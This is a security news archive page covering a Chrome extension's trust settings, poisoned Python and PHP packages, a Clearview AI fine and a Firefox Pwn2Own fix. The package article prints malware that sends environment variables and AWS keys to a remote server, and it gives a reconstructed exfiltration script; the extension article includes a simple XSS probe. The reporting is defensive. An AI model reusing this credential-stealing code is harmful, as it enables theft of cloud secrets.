Category Archives: News

Who’s watching your webcam? The Screencastify Chrome extension story…

We’ve often warned about the risks of browser extensions – not just for Chrome, but for any browser out there.

That’s because browser extensions aren’t subject to the same strict controls as the content of the web pages you download – otherwise they wouldn’t be extensions…

…they’d basically just be locally-cached web pages.

An ad-blocker or a password manager that was locked down so it worked on exactly one website wouldn’t be much use; a tab manager that could only manage one tab or site at a time wouldn’t be very helpful; and so on.

Web pages aren’t supposed to be able to override any controls imposed by the browser itself, so they can’t alter the address bar to display a bogus servername, or bypass the Are you sure? dialog that verifies you really did want to download that Word document to your hard disk.

Browser extensions, on the other hand, are supposed to be able, well, to extend and alter the behaviour of the browser itself.

Amongst other things, browser extensions can:

  • Peek at what is about to be shown in each tab after it’s been decrypted.
  • Modify what finally gets displayed.
  • See and tweak everything you type in or upload before it gets transmitted.
  • Read and write files on your local hard disk.
  • Launch or monitor other programs.
  • Access hardware such as webcams and microphones.

Screencastify is one example of a browser extension that provides a popular feature that wouldn’t be possible via a website alone, namely capturing some or all of your screen so you can share it with other users.

The extension boasts 10,000,000+ users (apparently, there is no higher category, no matter how many users you get to), and invites you, in its own description, to:

Security researcher Wladimir Palant, himself an extension developer, decided to look into Screencastify, given its popularity.

Earlier this week, he published what he found.

Amongst other things, his report is a well-written reminder of just how difficult it can be to work out who’s involved in the web of trust you need to have when you decide to use an app or service from company X.

Supply chain risks revisited

Just like source-code supply chain risks, where you install software from A, which is licensed from B, updates from C, pulls in additional modules from D (possibly repeated recursively in many interconnected stages)…

…web-based service risks can come from an implicit delegation of trust to many other vendors or providers who are involved in the service delivery process.

Palant started by looking at Screencastify’s Chrome manifest file, a JSON data file that comes with every extension to specify important information such as name, version number, security policy, update URL, and permissions needed.

One of the entries in a Chrome manifest is a list called externally_connectable, which states which extensions, apps and websites are allowed to interact with your extension.

Typically, other extensions and apps already installed on your system can do this by default, but for obvious security reasons, external websites can’t.

This means that you can’t innocently wander onto a website, just to take a look around, only to find that the server you’re visiting is trying to take control of the extension unexpectedly.

But Screencastify provides all sorts of additional cloud-based functionality from its own website, so it understandably included itself in the list of externally_connectable sources.

When Palant first looked, the connection trust list looked like this:

{ . . . "externally_connectable": { "matches": [ "https://*.screencastify.com/*" ] }, . . .
}

Given that the special character * means “match anything here”, the specification above says that any URL on any website under the screencastify.com domain is automatically authorised to interact remotely with your browser, via the Screencastify extension…

…which, don’t forget, has access to your webcam to provide a popular aspect of its service.

Palant quickly found that one of the requests that these externally_connectable websites could send to your browser was tagged bg:getSignInToken, and making this request returned a Google access token for your Google Drive files. (In our tests, Screencastify won’t work unless you have a Google account and are logged into it.)

Interestingly, according to Palant, the reason that Screencastify works with full access to Google Drive (extensions can, in fact, request access only to a directory of their own) is that without full access, an extension can’t display a list of its own files. So, to keep a stash of uploaded files that you can later browse through, it seems that an extension needs to go for full access, create a directory of its own, and then display its own files from there.

Additionally, as you would expect, given that Screencastify is all about screen capture with added webcam streaming, externally_connectable websites can request access to Chrome’s desktopCapture API (which can read in pixel content from anywhere on the screen), to the tabCapture API (which can extract content from inside the browser itself), and to the WebRTC API (short for web real-time communication, including webcam access).

Requests to capture your desktop or browser tabs are less controversial than they might sound, because they always produce an obvious popup dialog to request permission.

Apparently, Chrome asks every single time – there’s not even any inferred permission if you turn on screen capturing multiple times in a single session.

But webcam permissions only need to be requested once, which Screencastify does when you set it up, after which they can be claimed without further popups appearing.

Palant also found that Screencastify’s default video recording settings, once some sort of capture is enabled, include uploading the video to your Google Drive files.

And, as we mentioned above, any website on the externally_connectable list can acquire an access token for your Google Drive and download the videos later on, even if it didn’t sneakily start an unwanted webcam capture itself.

So what?

At this point, you might be thinking, “So what? I’ve already decided to trust Screencastify’s code and website, so this is not a surprise. I’m already expecting Screencastify to capture and store the video, so they’ll have it anyway.”

This is where the setting https://*.screencastify.com/* (see above) becomes significant.

As Palant discovered at the time of his research, at least six Screencastify subdomains were operated by third parties:

  • Webflow handled the www.screencastify.com subdomain,
  • Teachable handled course.screencastify.com,
  • Atlassian handled the subdomain status.screencastify.com,
  • Netlify handled quote.screencastify.com,
  • Marketo handled go.screencastify.com, and
  • ZenDesk handled learn.screencastify.com.
In other words, you not only needed to trust Screencastify’s extension and its own servers with “silent” access to your webcam and your Google Drive, but also to trust at least all the other providers above.

More specifically, you had to trust that there were no bugs such as cross-site scripting (XSS) flaws on any of those subdomains.

An XSS bug means that you can trick a site such as example.com into generating and serving up a web page that includes unmodified, dangerous content of your own choosing, such as a search result that includes a raw snippet of JavaScript code instead of a simple text string.

If you ask my website to search for Luap Nilkcud, and I return an HTML page that includes, say, <b>Luap Nilkcud</b> not found, try again, that’s mostly harmless, because the generated HTML just means “print the given text in bold and the rest in a plain font”.

But if you search for, say, <script>alert("Oops")</script>, and I reflect that text precisely, including the magic angle brackets, your browser will interpret and execute the code inside the script tags. (Those angle brackets should have been stripped out, or converted to the special codes &lt; and &gt; respectively.)

The “unescaped” script code will run with the same security powers as code stored on my own site, so you would effectively be able to inject JavaScript into my site’s served-up HTML without actually hacking my server.
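As a minimal sketch of the correct behaviour (our own illustration, not code from any of the sites involved), here’s how a Python backend might neutralise reflected search text with the standard library’s html.escape() before embedding it in a page:

 import html

 def not_found_message(query):
     # Convert &, <, > and quotes into entities such as &lt; and &gt;,
     # so reflected input is displayed as text instead of running as script.
     safe = html.escape(query)
     return "<b>" + safe + "</b> not found, try again"

 print(not_found_message('<script>alert("Oops")</script>'))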

Ultimately, Palant did find an XSS bug on one of the Screencastify properties, which he reported back in February.

To its credit, Screencastify acknowledged the bug on the very same day, and had it fixed by the next.

Lots of moving parts

This investigation is nevertheless a good reminder that there may be many more moving parts, and many more risk exposures, than you first think when you decide to go for product P or service S from vendor V.

Interestingly, since Palant’s report came out, Screencastify decided to restrict that overly-broad trust list in its externally_connectable specification, which has now been reduced to an explicit set of subdomains:

{ . . . "externally_connectable": { "matches": [ "https://captions.screencastify.com/*", "https://edit.screencastify.com/*", "https://questions.screencastify.com/*", "https://watch.screencastify.com/*", "https://www.screencastify.com/*" ] }, . . .
}

The www.screencastify.com subdomain, operated by a third party, is still there, but the explicit list makes it much easier for SecOps (security operations) researchers to quantify the overall risk of this extension if they are so inclined.

The least-privilege principle

It’s a great reminder of the value of the need-to-know, or least-privilege principle, which says that you shouldn’t give anyone access to resources they don’t need, no matter how much you trust them, on the grounds that there’s less to go wrong if you specify your security settings explicitly rather than implicitly.

Need-to-know also protects trusted users from making innocent mistakes that could be costly both for you and for them.

For example, sometimes you need to be logged in with root or Administrator powers…

…but you don’t need root to read your email or to browse the web, so you should set up your account so you can take on those superpowers only when needed, and relinquish them when you don’t.

Less, in cybersecurity, is very often more.


Poisoned Python and PHP packages purloin passwords for AWS access

A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP.

Following on-line discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPI repository had suddenly received an “update”, despite not otherwise being touched since late 2014.

In theory, of course, there’s nothing wrong with old packages suddenly coming back to life.

Sometimes, developers return to old projects when a lull in their regular schedule (or a guilt-provoking email from a long-standing user) finally gives them the impetus to apply some long-overdue bug fixes.

In other cases, new maintainers step up in good faith to revive “abandonware” projects.

But packages can become victims of secretive takeovers, where the password to the relevant account is hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.

Simply put, some package “revivals” are conducted entirely in bad faith, to give cybercriminals a vehicle for pushing out malware under the guise of “security updates” or “feature improvements”.

The attackers aren’t necessarily targeting any specific users of the package they compromise – often, they’re simply watching and waiting to see if anyone falls for their package bait-and-switch…

…at which point they have a way to target the users or companies that do.

New code, old version number

In this attack, Yee Ching Tok noticed that although the package suddenly got updated, its version number didn’t change, presumably in the hope that some people might [a] take the new version anyway, perhaps even automatically, but [b] not bother to look for differences in the code.

But a diff (short for difference, where only new, changed or deleted lines in the code are examined) showed added lines of Python code like this:

 if environ.get('AWS_ACCESS_KEY_ID') is not None:
     self.secret = environ.get('AWS_ACCESS_KEY_ID')

You may remember, from the infamous Log4Shell bug, that so-called environment variables, accessible via os.environ in Python, are memory-only key=value settings associated with a specific running program.

Data that’s presented to a program via a memory block doesn’t need to be written to disk, so this is a handy way of passing across secret data such as encryption keys while guarding against saving the data improperly by mistake.
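As a tiny illustration (our own, with a made-up variable name), here’s how a secret can be handed to a child process through its environment without ever touching the disk:

 import os
 import subprocess
 import sys

 # Add a made-up secret to a copy of the current environment...
 child_env = dict(os.environ, API_TOKEN="s3cr3t-value")

 # ...and hand it to a child process, which reads it straight from memory.
 subprocess.run(
     [sys.executable, "-c", "import os; print('token is', os.environ.get('API_TOKEN'))"],
     env=child_env,
 )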

However, if you can poison a running program, which will already have access to the memory-only process environment, you can read out the secrets for yourself and steal them, for example by sending them out buried in regular-looking network traffic.

If you leave the bulk of the source code you’re poisoning untouched, its usual functions will still work as before, and so the malevolent tweaks in the package are likely to go unnoticed.

Why now?

Apparently, the reason this package was attacked only recently is that the domain name used for email by the original maintainer had just expired.

The attackers were therefore able to buy up the now-unused domain name, set up an email server of their own, and reset the password on the account.

Interestingly, the poisoned ctx package was soon updated twice more, with more added “secret sauce” squirrelled away in the infected code, this time including more aggressive data-stealing code.

The requests.get() line below connects to an external server controlled by the crooks, though we have redacted the domain name here:

 def sendRequest(self):
     str = ""
     for _, v in environ.items():
         str += v + " "
     ### --encode string into base64
     resp = requests.get("https://[REDACTED]/hacked/" + str)

The redacted exfiltration server will receive the encoded environment variables (including any stolen data such as access keys) as an innocent-looking string of random-looking data at the end of the URL.

The response that comes back doesn’t actually matter, because it’s the outgoing request, complete with appended secret data, that the attackers are after.

If you want to try this for yourself, you can create a standalone Python program based on the pseudocode above, such as this:
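The listing below is our own minimal reconstruction, not the crooks’ exact code: it assumes a local pseudoserver listening on http://localhost:8080 (standing in for the redacted server), and uses URL-safe base64 for the encoding step mentioned in the comment above:

 import base64
 import requests
 from os import environ

 # Concatenate the value of every environment variable, as the poisoned package did...
 data = ""
 for _, v in environ.items():
     data += v + " "

 # ...encode the lot so it looks like one random-looking blob...
 blob = base64.urlsafe_b64encode(data.encode()).decode()

 # ...and send it out, buried at the end of an innocent-looking URL.
 # (localhost:8080 is our stand-in; the real exfiltration server was redacted.)
 resp = requests.get("http://localhost:8080/hacked/" + blob)
 print(resp.status_code)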

Then start a listening HTTP pseudoserver in a separate window (we used the excellent ncat utility from the Nmap toolkit), and run the Python code.
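If you don’t have ncat to hand, a few lines of Python’s built-in http.server module make a serviceable stand-in listener (this is our own alternative, not part of the original test):

 from http.server import BaseHTTPRequestHandler, HTTPServer

 class DumpHandler(BaseHTTPRequestHandler):
     def do_GET(self):
         # Print the request line, which includes the data-stuffed URL...
         print(self.requestline)
         # ...then send back a bland "everything is fine" reply.
         self.send_response(200)
         self.end_headers()
         self.wfile.write(b"OK\r\n")

 HTTPServer(("localhost", 8080), DumpHandler).serve_forever()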

Here, we’re in the Bash shell: we used env -i to strip down the environment variables to save space, and ran the Python exfiltration script with a fake AWS environment variable set (the access key we chose is one of Amazon’s own deliberately non-functional examples used for documentation).

The listening server (you need to start this first so the Python code has something to connect to) will answer the request and dump the data that was sent.

The GET /... line in the listener’s output captures the encoded data that was exfiltrated in the URL.

We can now decode the base64 data from the GET request to reveal the fake AWS key that we added to the process environment in the other window.
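To illustrate the decoding step (this is our own sketch, round-tripping a fake value so the snippet runs on its own, rather than the actual captured output):

 import base64

 # Stand-in for the random-looking blob at the end of the captured GET request.
 # (AKIAIOSFODNN7EXAMPLE is Amazon's documented, non-functional example key ID.)
 fake_env = "AKIAIOSFODNN7EXAMPLE "
 blob = base64.urlsafe_b64encode(fake_env.encode()).decode()

 # This is the step you'd apply to the real blob copied from the listener window:
 print(base64.urlsafe_b64decode(blob).decode())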

Related criminality

Intrigued, Yee Ching Tok went looking elsewhere for the exfiltration servername that we redacted above.

Surprise, surprise!

The same server turned up in code recently uploaded to a PHP project on GitHub, presumably because it just happened to be compromised by the same attackers at around the same time.

That project is what used to be a legitimate PHP hashing toolkit called phpass, but it now contains these three lines of unwanted and dangerous code:

 $access = getenv('AWS_ACCESS_KEY_ID');
 $secret = getenv('AWS_SECRET_ACCESS_KEY');
 $xml = file_get_contents("http://[REDACTED]hacked/$access/$secret");

Here, any Amazon Web Services access secrets, which are pseudorandom character strings, are extracted from environment memory (getenv() above is PHP’s equivalent of os.environ.get() in the rogue Python code you saw before) and fashioned into a URL.

This time, the crooks have used http instead of https, thus not only stealing your secret data for themselves, but also making the connection without encryption, thereby exposing your AWS secrets to anyone logging your traffic as it traverses the internet.

What to do?

  • Don’t blindly accept open-source package updates when they show up. Go through the code differences yourself (see the sketch after this list) before you decide that the update is in your interest. Yes, determined criminals will typically hide their illegal code changes more subtly than the hacks you see above, so it might not be as easy to spot. But if you don’t look at all, then the crooks can get away with anything they want.
  • Check for suspicious changes in any maintainer’s account before trusting it. Look at the documentation in the previous version of the code (presumably, code that you already have) for the contact details of the previous maintainer, and see what’s changed on the account since the last update. In particular, if you can see domain names that expired and were only re-registered recently, or email changes that introduce new maintainers with no obvious previous interest in the project, be suspicious.
  • Don’t rely only on module tests that verify correct behaviour. Aim for generic tests that look for unwanted, unusual and unexpected behaviour as well, especially if that behaviour has no obvious connection to the package you’ve changed. For example, a utility to compute password hashes shouldn’t make network connections, so if you catch it doing so (using test data rather than live information, of course!) then you should suspect foul play.
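If you want a quick way to eyeball such code differences, Python’s standard difflib module can produce a unified diff. The sketch below is our own generic illustration with made-up file contents (it is not the real ctx code); in practice you would read the old and new files from the two downloaded package versions:

 import difflib

 # Hypothetical stand-ins for the same file from the old and the "updated" release.
 old_code = "def getenv(name):\n    return environ.get(name)\n".splitlines()
 new_code = "def getenv(name):\n    sendRequest()   # suspicious extra call\n    return environ.get(name)\n".splitlines()

 # Lines starting with '+' were added, lines starting with '-' were removed.
 for line in difflib.unified_diff(old_code, new_code, "old/ctx.py", "new/ctx.py", lineterm=""):
     print(line)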

Threat detection tools such as Sophos XDR (the letters XDR are industry jargon for extended detection and response) can help here by allowing you to keep your eye on programs you’re testing, and then to review their activity record for types of behaviour that shouldn’t be there.

After all, if you know what your software is supposed to do, you should also know what it’s not supposed to do!


Clearview AI face-matching service fined a lot less than expected

Face-matching service Clearview AI has only been around for five years, but it has courted plenty of controversy in that time, both inside and outside the courtroom.

Indeed, we’ve written about Clearview AI many times since the start of 2020, when a class action suit was brought against the company in the US state of Illinois, which has some of the country’s strictest data protection laws for biometric data:

As the court documents alleged at the time:

Without obtaining any consent and without notice, Defendant Clearview used the internet to covertly gather information on millions of American citizens, collecting approximately three billion pictures of them, without any reason to suspect any of them of having done anything wrong, ever.

[…A]lmost none of the citizens in the database has ever been arrested, much less been convicted. Yet these criminal investigatory records are being maintained on them, and provide government almost instantaneous access to almost every aspect of their digital lives.

The class action went on to claim that:

Clearview created its database by violating each person’s privacy rights, oftentimes stealing their pictures from websites in a process called “scraping,” which violate many platforms’ and sites’ terms of service, and in other ways contrary to the sites’ rules and contractual requirements.

Cease and desist

Indeed, the company quickly faced demands from Facebook, Twitter and YouTube to stop using images from their services, with the search and social media giants all singing from the same songbook with words to the effect of, “Our terms and conditions say ‘no scraping’, and that’s exactly what we mean”:

Clearview AI’s founder and CEO Hoan Ton-That was unimpressed, hitting back with a claim that America’s free-speech laws gave him the right to access what he called “public information”, noting, “Google can pull in information from all different websites. If it’s public […] and it can be inside Google’s search engine, it can be in ours as well.”

Of course, anyone who thinks that the internet should operate on a strictly opt-in basis would argue that two wrongs don’t make a right, and the fact that Google has collected the data already doesn’t justify someone scraping it again from Google, especially not for the purposes of automated and indiscriminate face-matching by unspecified customers, and in defiance of Google’s own terms and conditions.

And even the most vocal opt-in-only advocate will probably admit that an opt-out mechanism is better than no protection at all, provided that the process actually works.

Whatever you think of Google, for instance, the company does honour “do not index” requests from website operators, such as a robots.txt file in the root directory of your webserver, or an HTTP header X-Robots-Tag: noindex in your web replies.
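For example, a blanket “please stay away” robots.txt (our own minimal illustration, not any particular site’s file) looks like this:

 User-agent: *
 Disallow: /

…while the per-response alternative is a reply header of the form:

 X-Robots-Tag: noindex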

YouTube hit back unequivocally, saying:

YouTube’s Terms of Service explicitly forbid collecting data that can be used to identify a person. Clearview has publicly admitted to doing exactly that, and in response we sent them a cease and desist letter.

More trouble at the image-processing mill

Not long after the social media scraping brouhaha, Clearview AI suffered a widely-publicised data breach.

Although it insisted that its servers “were never accessed”, it simultaneously admitted that hackers had indeed made off with a slew of customer data, including how many searches each customer had performed.

Later in 2020, on top of the class action in Illinois, Clearview AI was sued by the American Civil Liberties Union (ACLU).

And in 2021, the company was jointly investigated by the privacy regulators of the UK and Australia, the ICO and the OAIC respectively. (Those initialisms are short for Information Commissioner’s Office and Office of the Australian Information Commissioner.)

As we explained at the time, the ICO concluded that Clearview:

  • Had no lawful reason for collecting the information in the first place;
  • Did not process information in a way that people were likely to expect;
  • Had no process to stop the data being retained indefinitely;
  • Did not meet the “higher data protection standards” required for biometric data;
  • Did not tell anyone what was happening to their data.

Loosely speaking, both the OAIC and the ICO concluded that an individual’s right to privacy trumped any consideration of “fair use” or “free speech”, and both regulators explicitly denounced Clearview’s data collection as unlawful.

The ICO, indeed, announced that it planned to fine Clearview AI more than £17m [then about $20m].

What happened next?

Well, as the ICO told us in a press release that we received this morning, its proposed fine has now been imposed.

Except that instead of being “over £17 million“, as stated in the ICO’s provisional assessment, Clearview AI has got away with a fine of well under half that amount.

As the press release explained:

The Information Commissioner’s Office (ICO) has fined Clearview AI Inc £7,552,800 [now about $9.5m] for using images of people in the UK, and elsewhere, that were collected from the web and social media to create a global online database that could be used for facial recognition.

The ICO has also issued an enforcement notice, ordering the company to stop obtaining and using the personal data of UK residents that is publicly available on the internet, and to delete the data of UK residents from its systems.

Simply put, the company has eventually been punished, but apparently with less than 45% of the financial vigour that was originally proposed.

What to do?

Clearview AI has now explicitly fallen foul of the law in the UK, and will no longer be allowed to scrape images of UK residents at all (though how this will be policed, let alone enforced, is unclear).

The problem, sadly, is that even if the vast majority of countries follow suit and order Clearview AI to stay away, those legalisms won’t actively stop your photos getting scraped, in just the same way that laws criminalising the use of malware almost everywhere in the world haven’t put an end to malware attacks.

So, as we’ve said before when it comes to image privacy, we need to ask not merely what our country can do for us, but also what we can do for ourselves:

  • If in doubt, don’t give it out. By all means publish photos of yourself, but be thoughtful and sparing about quite how much you give away about yourself and your lifestyle when you do. Assume they will get scraped whatever the law says, and assume someone will try to misuse that data if they can.
  • Don’t upload data about your friends without permission. It feels a bit boring, but it’s the right thing to do. Ask everyone in the photo if they mind you uploading it, ideally before you even take it. Even if you’re legally in the right to upload the photo because you took it, respect others’ privacy as you hope they’ll respect yours.

Let’s aim for a truly opt-in online future, where nothing to do with privacy is taken for granted, and every picture that’s uploaded has the consent of everyone in it.


Mozilla patches Wednesday’s Pwn2Own double-exploit… on Friday!

Just a short note to let you know that we were wrong about Firefox and Pwn2Own in our latest podcast…

…but we were right about how Mozilla would react in our latest podcast promotional video:

In the video, we said (our own emphasis below):

In the podcast, we speculated, “Was this [recent Firefox fix] pushed out just in time for Pwn2Own, in the hope that it would prevent the attack working?” If that was the reason, it didn’t work. […] But we do know that Mozilla will be rushing to fix this one as soon as they get the details out of the Pwn2Own competition.

To explain.

In an article last weekend, after our Linux distro had received an apparently-hurried out-of-band Firefox patch but the update still hadn’t shown up on Firefox’s website, we found ourselves wondering, “Is there some kind of cybersecurity scramble on here?”

This update added a sandbox security feature known as Win32k Lockdown that had been months, if not years, in the making, but had just missed the scheduled 100.0 release.

Accordingly, we speculated that Firefox 100.0.1, a mere point-release in which a brand new Windows security feature had suddenly been activated, was wrangled out specially, just in time for this year’s Pwn2Own hacking competition in Vancouver, Canada.

Why not wait?

We were surprised that Mozilla didn’t simply wait until the next scheduled release, 101.0, to turn the new feature on and announce it as a feature, rather than as a “security fix”, given that it wasn’t there to stop a clear and specific attack that was already known.

Usually, point releases come out to deal with urgent issues that genuinely can’t wait, such as new features that flop, or zero-day bugs that suddenly show up in the wild and need dealing with before the next four-weekly major update deadline rolls around.

But with Pwn2Own taking place this very week, and with Firefox in the firing line from experienced and successful bug hunter Manfred Paul, maybe Mozilla figured that it was worth squeezing out 100.0.1 in time for the contest?

Just in case the new sandbox feature might throw an unexpected spanner into Paul’s otherwise-certain-to-succeed hacking session, and save the day?

On Wednesday, Paul’s session started with 30’00” on the clock, counting downwards (a hard upper bound of 30 minutes is imposed for each entrant).

After a brief pause, the adjudicator reached out and clicked a button to initiate the hacking attempt by visiting a URL that was ready to unleash Paul’s double-exploit remotely. (The server was remote in network terms; physically it was on the same table as the client under attack.)

Loosely speaking, Paul planned to break into Firefox, earning $50,000 in bug bounty for remote code execution, and then to break back out of it, earning another $50,000 for a full sandbox escape.

About seven elapsed seconds later, with a fist pump of acknowledgment from the adjudicator (Pwn2Own is exciting for everyone, not just the hackers), and with an unsurprisingly happy smile from Manfred Paul, now $100,000 better off, the clock stopped, having just flipped over to show 29’52”.

If Win32k Lockdown was supposed to stop the Pwn2Own attack, it didn’t, although we don’t doubt that the new sandbox protection will make plenty of future exploits harder to find and less reliable to use.

To claim a Pwn2Own prize, the deal is that you have to “show your working”, in complete explanatory detail, to the maker of the system you just cracked, and give them first dibs at fixing it.

All proper bug bounties work this way, of course, but Pwn2Own isn’t just about spotting possible bugs and calling them in with a crash log, it’s about researching and writing up the bug and its dangers with careful and repeatable details, up to and including a working exploit.

Well done to everyone involved

Well, that seven-second spectacular pwnage happened on Wednesday 2022-05-18.

And on Friday 2022-05-20, about an hour before midnight UK time, Firefox popped up to tell us, “An update is available to 100.0.2”.

Here are the associated security notes, from Mozilla Security Advisory 2022-19:

 * CVE-2022-1802: Prototype pollution in Top-Level Await implementation.
   Reporter: Manfred Paul via Trend Micro's Zero Day Initiative
   Impact: Critical
   Description: If an attacker was able to corrupt the methods of an Array object
   in JavaScript via prototype pollution, they could have achieved execution of
   attacker-controlled JavaScript code in a privileged context.

 * CVE-2022-1529: Untrusted input used in JavaScript object indexing, leading to
   prototype pollution.
   Reporter: Manfred Paul via Trend Micro's Zero Day Initiative
   Impact: Critical
   Description: An attacker could have sent a message to the parent process where
   the contents were used to double-index into a JavaScript object, leading to
   prototype pollution and ultimately attacker-controlled JavaScript executing in
   the privileged parent process.

What to do?

We’ve patched already – how about you?

For the fourth time in the past week, we’re going to say: Patch early, patch often.

With a response time like this, it would be rude not to!

Oh, and a very big “well done and thanks” to everyone at every stage of this bug finding-and-fixing process.

